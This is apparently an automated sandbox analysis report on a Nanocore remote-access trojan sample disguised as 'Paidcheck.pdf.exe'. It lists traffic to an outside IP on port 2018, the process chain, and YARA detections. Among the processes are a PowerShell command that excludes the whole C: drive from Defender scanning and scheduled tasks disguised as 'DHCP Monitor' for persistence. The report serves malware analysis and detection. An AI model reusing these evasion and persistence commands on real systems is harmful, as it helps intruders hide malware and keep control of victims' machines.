                                                                          Jul 22, 2021 09:33:56.488982916 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.507988930 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.528382063 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.529011011 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.558902025 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.586736917 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.586827993 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.609428883 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.637464046 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.637551069 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.663389921 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.685360909 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.686065912 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.882875919 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.914400101 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.914520979 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.929743052 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.953509092 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:56.953849077 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:56.973794937 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.005930901 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.006145000 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.034375906 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.057420015 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.057521105 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.088378906 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.123553038 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.123647928 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.149461985 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.167922974 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.168118000 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.196690083 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.224085093 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.224186897 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.254780054 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.286422968 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.286598921 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.313440084 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.339306116 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.339427948 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.367708921 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.393449068 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.393815994 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.419385910 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.448307037 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.449094057 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.472345114 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.490677118 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.493109941 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.512346029 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.531621933 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.531805992 CEST497042018192.168.2.3217.138.212.57
                                                                          Jul 22, 2021 09:33:57.565617085 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.600038052 CEST201849704217.138.212.57192.168.2.3
                                                                          Jul 22, 2021 09:33:57.600147963 CEST497042018192.168.2.3217.138.212.57

                                                                          Code Manipulations

                                                                          Statistics

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          General

                                                                          Start time:09:32:56
                                                                          Start date:22/07/2021
                                                                          Path:C:\Users\user\Desktop\Paidcheck.pdf.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\Paidcheck.pdf.exe'
                                                                          Imagebase:0x6a0000
                                                                          File size:580096 bytes
                                                                          MD5 hash:CE32E8605ADB6C9BB2DCEE69FE887B46
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          Reputation:low

                                                                          General

                                                                          Start time:09:33:42
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\SysWOW64\wscript.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Fimmlfqfvyftboxhdsnydr.vbs'
                                                                          Imagebase:0x1030000
                                                                          File size:147456 bytes
                                                                          MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:42
                                                                          Start date:22/07/2021
                                                                          Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          Imagebase:0x760000
                                                                          File size:64616 bytes
                                                                          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489583324.0000000006AE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489824086.0000000006B70000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489650753.0000000006B00000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489080890.0000000006540000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489200537.0000000006A60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489750000.0000000006B30000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489515474.0000000006AC0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489556083.0000000006AD0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489421921.0000000006AB0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.487959642.0000000005CF0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489379501.0000000006AA0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.489724934.0000000006B20000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, Author: Florian Roth
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.486430040.0000000003EBC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                          Antivirus matches:
                                                                          • Detection: 0%, Virustotal, Browse
                                                                          • Detection: 0%, Metadefender, Browse
                                                                          • Detection: 0%, ReversingLabs
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:43
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dwrn\explorerr.exe'
                                                                          Imagebase:0x1260000
                                                                          File size:430592 bytes
                                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:44
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:45
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp4FE3.tmp'
                                                                          Imagebase:0xe40000
                                                                          File size:185856 bytes
                                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:47
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:49
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp5C0A.tmp'
                                                                          Imagebase:0xe40000
                                                                          File size:185856 bytes
                                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:49
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:50
                                                                          Start date:22/07/2021
                                                                          Path:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Local\Temp\RegAsm.exe 0
                                                                          Imagebase:0xca0000
                                                                          File size:64616 bytes
                                                                          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:51
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:51
                                                                          Start date:22/07/2021
                                                                          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
                                                                          Imagebase:0x2a0000
                                                                          File size:64616 bytes
                                                                          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Antivirus matches:
                                                                          • Detection: 0%, Virustotal, Browse
                                                                          • Detection: 0%, Metadefender, Browse
                                                                          • Detection: 0%, ReversingLabs
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:51
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          General

                                                                          Start time:09:33:56
                                                                          Start date:22/07/2021
                                                                          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
                                                                          Imagebase:0x8a0000
                                                                          File size:64616 bytes
                                                                          MD5 hash:6FD7592411112729BF6B1F2F6C34899F
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET

                                                                          General

                                                                          Start time:09:33:57
                                                                          Start date:22/07/2021
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff6b2800000
                                                                          File size:625664 bytes
                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language

                                                                          Disassembly

                                                                          Code Analysis

                                                                          Reset < >